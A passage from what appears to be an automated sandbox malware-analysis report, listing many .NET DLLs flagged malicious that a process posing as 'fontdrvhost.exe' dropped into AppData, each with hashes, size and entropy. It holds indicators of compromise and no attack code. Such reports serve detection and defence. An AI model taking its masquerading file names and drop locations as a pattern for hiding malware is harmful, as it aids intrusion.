                                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):34304
                                                                  Entropy (8bit):5.618776214605176
                                                                  Encrypted:false
                                                                  SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                  MD5:9B25959D6CD6097C0EF36D2496876249
                                                                  SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                  SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                  SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):34304
                                                                  Entropy (8bit):5.618776214605176
                                                                  Encrypted:false
                                                                  SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                  MD5:9B25959D6CD6097C0EF36D2496876249
                                                                  SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                  SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                  SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33792
                                                                  Entropy (8bit):5.541771649974822
                                                                  Encrypted:false
                                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):39936
                                                                  Entropy (8bit):5.629584586954759
                                                                  Encrypted:false
                                                                  SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                  MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                  SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                  SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                  SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):39936
                                                                  Entropy (8bit):5.660491370279985
                                                                  Encrypted:false
                                                                  SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                  MD5:240E98D38E0B679F055470167D247022
                                                                  SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                  SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                  SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):50176
                                                                  Entropy (8bit):5.723168999026349
                                                                  Encrypted:false
                                                                  SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                  MD5:2E116FC64103D0F0CF47890FD571561E
                                                                  SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                  SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                  SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):69632
                                                                  Entropy (8bit):5.932541123129161
                                                                  Encrypted:false
                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):126976
                                                                  Entropy (8bit):6.057993947082715
                                                                  Encrypted:false
                                                                  SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                  MD5:16B480082780CC1D8C23FB05468F64E7
                                                                  SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                  SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                  SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33280
                                                                  Entropy (8bit):5.634433516692816
                                                                  Encrypted:false
                                                                  SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                  MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                  SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                  SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                  SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):46592
                                                                  Entropy (8bit):5.870612048031897
                                                                  Encrypted:false
                                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33280
                                                                  Entropy (8bit):5.634433516692816
                                                                  Encrypted:false
                                                                  SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                  MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                  SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                  SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                  SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):40448
                                                                  Entropy (8bit):5.7028690200758465
                                                                  Encrypted:false
                                                                  SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                  MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                  SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                  SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                  SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):294912
                                                                  Entropy (8bit):6.010605469502259
                                                                  Encrypted:false
                                                                  SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                  MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                  SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                  SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                  SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):34304
                                                                  Entropy (8bit):5.618776214605176
                                                                  Encrypted:false
                                                                  SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                  MD5:9B25959D6CD6097C0EF36D2496876249
                                                                  SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                  SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                  SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                  Malicious:true
                                                                  Process:C:\Users\user\Desktop\ZT3pxe2Tb4.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):50176
                                                                  Entropy (8bit):5.723168999026349
                                                                  Encrypted:false
                                                                  SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                  MD5:2E116FC64103D0F0CF47890FD571561E
                                                                  SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                  SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                  SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):36352
                                                                  Entropy (8bit):5.668291349855899
                                                                  Encrypted:false
                                                                  SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                  MD5:94DA5073CCC14DCF4766DF6781485937
                                                                  SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                  SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                  SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                  Malicious:true
                                                                  Process:C:\Users\user\Desktop\ZT3pxe2Tb4.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33280
                                                                  Entropy (8bit):5.634433516692816
                                                                  Encrypted:false
                                                                  SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                  MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                  SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                  SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                  SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):39936
                                                                  Entropy (8bit):5.660491370279985
                                                                  Encrypted:false
                                                                  SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                  MD5:240E98D38E0B679F055470167D247022
                                                                  SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                  SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                  SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33280
                                                                  Entropy (8bit):5.634433516692816
                                                                  Encrypted:false
                                                                  SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                  MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                  SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                  SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                  SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):39936
                                                                  Entropy (8bit):5.660491370279985
                                                                  Encrypted:false
                                                                  SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                  MD5:240E98D38E0B679F055470167D247022
                                                                  SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                  SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                  SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):64000
                                                                  Entropy (8bit):5.857602289000348
                                                                  Encrypted:false
                                                                  SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                  MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                  SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                  SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                  SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33792
                                                                  Entropy (8bit):5.541771649974822
                                                                  Encrypted:false
                                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):38912
                                                                  Entropy (8bit):5.679286635687991
                                                                  Encrypted:false
                                                                  SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                  MD5:9E910782CA3E88B3F87826609A21A54E
                                                                  SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                  SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                  SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):294912
                                                                  Entropy (8bit):6.010605469502259
                                                                  Encrypted:false
                                                                  SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                  MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                  SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                  SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                  SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):85504
                                                                  Entropy (8bit):5.8769270258874755
                                                                  Encrypted:false
                                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):41472
                                                                  Entropy (8bit):5.6808219961645605
                                                                  Encrypted:false
                                                                  SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                  MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                  SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                  SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                  SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):38400
                                                                  Entropy (8bit):5.699005826018714
                                                                  Encrypted:false
                                                                  SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                  MD5:87765D141228784AE91334BAE25AD743
                                                                  SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                  SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                  SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):46592
                                                                  Entropy (8bit):5.870612048031897
                                                                  Encrypted:false
                                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):36352
                                                                  Entropy (8bit):5.668291349855899
                                                                  Encrypted:false
                                                                  SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                  MD5:94DA5073CCC14DCF4766DF6781485937
                                                                  SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                  SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                  SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):126976
                                                                  Entropy (8bit):6.057993947082715
                                                                  Encrypted:false
                                                                  SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                  MD5:16B480082780CC1D8C23FB05468F64E7
                                                                  SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                  SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                  SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):32256
                                                                  Entropy (8bit):5.631194486392901
                                                                  Encrypted:false
                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):69632
                                                                  Entropy (8bit):5.932541123129161
                                                                  Encrypted:false
                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
